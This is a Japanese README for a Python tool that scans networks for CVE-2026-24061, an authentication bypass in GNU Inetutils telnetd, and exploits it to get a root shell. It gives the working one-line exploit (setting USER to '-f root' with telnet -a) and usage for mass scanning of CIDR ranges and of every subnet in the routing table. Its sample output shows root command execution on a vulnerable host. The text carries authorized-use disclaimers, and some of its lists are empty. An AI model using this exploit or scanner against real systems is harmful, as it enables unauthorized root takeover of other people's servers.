
Pythonベースのスキャナで、CVE-2026-24061のtelnetd認証バイパスを検出・悪用し、脆弱なGNU Inetutilsサービス上でrootシェルアクセスを可能にします。
GNU Inetutils telnetd サービスにおける CVE-2026-24061 脆弱性を検出・悪用するための Python ベースのスキャナーです。このツールは、認証バイパスによる root シェルアクセスを許す脆弱な telnetd サービスを、IP アドレスまたはネットワークに対してスキャンします。
本ソフトウェアは、教育目的および許可されたセキュリティテスト目的でのみ提供されます。
本アプリケーションは、セキュリティ脆弱性を実証し、許可されたセキュリティテストおよび研究を支援することを唯一の目的として開発されています。
本ソフトウェアは、明示または黙示を問わず、いかなる種類の保証もなく「現状のまま」提供されます。 商品性、特定目的への適合性、および非侵害の保証を含みますがこれらに限定されません。著作者および貢献者は、本ソフトウェアがエラーフリー、安全、または機能的であることを保証しません。 本ソフトウェアにはバグ、エラー、またはその他の欠陥が含まれる可能性があります。
本ソフトウェアの使用に関するすべての責任および法的責任は、完全に利用者に帰属します。 本ソフトウェアの著作者、貢献者、および配布者は、本ソフトウェアの使用、誤用、または使用不能に起因するいかなる損害、損失、または法的結果についても責任を負いません。
このツールは、所有しているシステム、または明示的な書面によるテスト許可を得たシステムに対してのみ使用する必要があります。コンピュータシステムへの不正アクセスは違法であり、刑事訴追の対象となる可能性があります。
著作者は以下を保証しません:
本ソフトウェアを使用することにより、お客様はこれらの条項を読み、理解し、拘束されることに同意したものとみなされます。同意しない場合は、本ソフトウェアを使用しないでください。
開発者: Cuma KURT
メール: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/
CVE-2026-24061: バージョン 2.7 までの GNU Inetutils telnetd は、USER 環境変数に -f root 値を指定することでリモートからの認証バイパスを許可します。
CVSS スコア: 9.8 (Critical)
telnet クライアント (通常 Linux/macOS にプリインストールされています)pip3 install -r requirements.txt
注記: ほとんどの依存関係は Python 標準ライブラリの一部です。このツールは Python 3.6+ でそのまま動作します。
# 単一の IP アドレスをスキャン
python3 tscan.py 192.168.1.1
# CIDR ネットワークをスキャン
python3 tscan.py 192.168.1.0/24
# カスタムポートでスキャン
python3 tscan.py -p 2323 192.168.1.1
# ファイルからターゲットをスキャン
python3 tscan.py targets.txt
# 複数の IP アドレスをスキャン
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1
# 複数の CIDR ネットワークをスキャン
python3 tscan.py 192.168.1.0/24 10.0.0.0/16
# 高速スキャンのためにスレッド数を増やす (100 スレッド)
python3 tscan.py -t 100 192.168.1.0/24
# 低速ネットワーク向けにタイムアウトを増やす
python3 tscan.py --timeout 10 192.168.1.0/24
# 大規模ネットワークスキャンでは両方を組み合わせる
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16
# システムのルーティングテーブルからすべてのサブネットを自動検出してスキャン
python3 tscan.py --auto
# または短縮形:
python3 tscan.py -a
# カスタムポートで自動検出
python3 tscan.py --auto -p 2323
# または:
python3 tscan.py -a -p 2323
# 高スレッド数で自動検出
python3 tscan.py --auto -t 200
# または:
python3 tscan.py -a -t 200
注記: --auto モードは、ip route list または route -n コマンドを使用してシステムのルーティングテーブルを読み取り、検出されたすべてのサブネットを自動的にスキャンします。
# 例 1: ローカルネットワークのクイックスキャン
python3 tscan.py 192.168.1.0/24
# 例 2: 高並行性による高速スキャン
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16
# 例 3: 非標準の telnet ポートをスキャン
python3 tscan.py -p 2323 192.168.1.0/24
# 例 4: すべてのローカルネットワークサブネットを自動検出してスキャン
python3 tscan.py --auto
# または:
python3 tscan.py -a
# 例 5: カスタム設定で自動検出
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# または:
python3 tscan.py -a -p 2323 -t 100 --timeout 8
positional arguments:
targets IP アドレス、CIDR ネットワーク、またはターゲットを含むファイルパス
options:
-h, --help このヘルプメッセージを表示して終了
-p, --port PORT スキャンする Telnet ポート (デフォルト: 23)
-t, --threads THREADS 同時スレッド数 (デフォルト: 50)
--timeout TIMEOUT 接続タイムアウト (秒) (デフォルト: 5)
-v, --verbose 詳細出力
-a, --auto システムのルーティングテーブル (route -n または ip route list) からすべてのサブネットを自動検出してスキャン
1 行に 1 ターゲットを記述したテキストファイルを作成します:
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16
# で始まる行はコメントとして扱われ、無視されます。
このツールは以下を提供します:
リアルタイム進行状況: 発見された結果をリアルタイムで表示
[!] - 脆弱なホスト[~] - ポートはオープンだが脆弱ではないサマリーレポート: 以下を含みます:
[*] 256 ターゲットのスキャンを開始...
[*] ポート: 23、スレッド: 50、タイムアウト: 5 秒
[*] 進行状況: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | オープン: 2 | 脆弱: 1
[!] 192.168.1.100:23 - 脆弱
[*] 進行状況: [████████████████████████████████████] 100.0% (256/256) | オープン: 3 | 脆弱: 1
[+] スキャン完了: 256/256 ターゲットをスキャンしました
======================================================================
スキャン結果サマリー
======================================================================
検出された Telnet サービス: 3
脆弱なホスト: 1
[!] 脆弱なホスト:
● 192.168.1.100:23
出力: uid=0(root) gid=0(root) groups=0(root)...
[~] 検出されたが脆弱ではない Telnet サービス:
● 192.168.1.101:23
● 192.168.1.102:23
[*] スキャンは 12.34 秒で完了しました
USER="-f root" 環境変数を設定telnet -a コマンドで接続この脆弱性は、USER 環境変数を -f root に設定することで認証バイパスを可能にします:
USER="-f root" telnet -a TARGET_IP [PORT]
これにより telnetd は USER 変数をフラグとして解釈し、認証をバイパスして root アクセスを許可します。
telnet クライアントのインストールが必要ですip route list または route -n コマンドが必要ですtelnet クライアントをインストールします:
# Debian/Ubuntu
sudo apt-get install telnet
# CentOS/RHEL
sudo yum install telnet
# macOS
# 通常はプリインストールされています
--timeout 10このツールは以下を目的としています:
このツールを以下の目的で使用しないでください:
このプログラムはフリーソフトウェアです。フリーソフトウェア財団によって発行された GNU 一般公衆利用許諾書 (GPL) バージョン 3、または (お客様の選択により) それ以降のバージョンの条項に基づいて、再配布および/または変更することができます。
このプログラムは有用であることを期待して配布されていますが、いかなる保証もありません。 商品性または特定目的への適合性に関する暗黙の保証もありません。詳細については、GNU 一般公衆利用許諾書を参照してください。
このプログラムとともに GNU 一般公衆利用許諾書のコピーを受け取っているはずです。受け取っていない場合は、https://www.gnu.org/licenses/ を参照してください。
完全な GNU 一般公衆利用許諾書 v3.0 のテキストについては、LICENSE ファイルを参照してください。
著作者および貢献者は、このツールによって引き起こされた誤用または損害について一切責任を負いません。
このツールは教育目的および許可されたセキュリティテスト目的でのみ提供されます。
自己責任で使用してください。 本ソフトウェアの使用に関するすべての責任および法的責任は、完全に利用者に帰属します。著作者は、本ソフトウェアの正確性、セキュリティ、または機能性を保証しません。本ソフトウェアは、いかなる種類の保証もなく「現状のまま」提供されます。
本アプリケーションは教育目的のみで開発されています。 本ソフトウェアを使用することにより、お客様は以下を了承したものとみなされます:
これらの条項に同意しない場合は、本ソフトウェアを使用しないでください。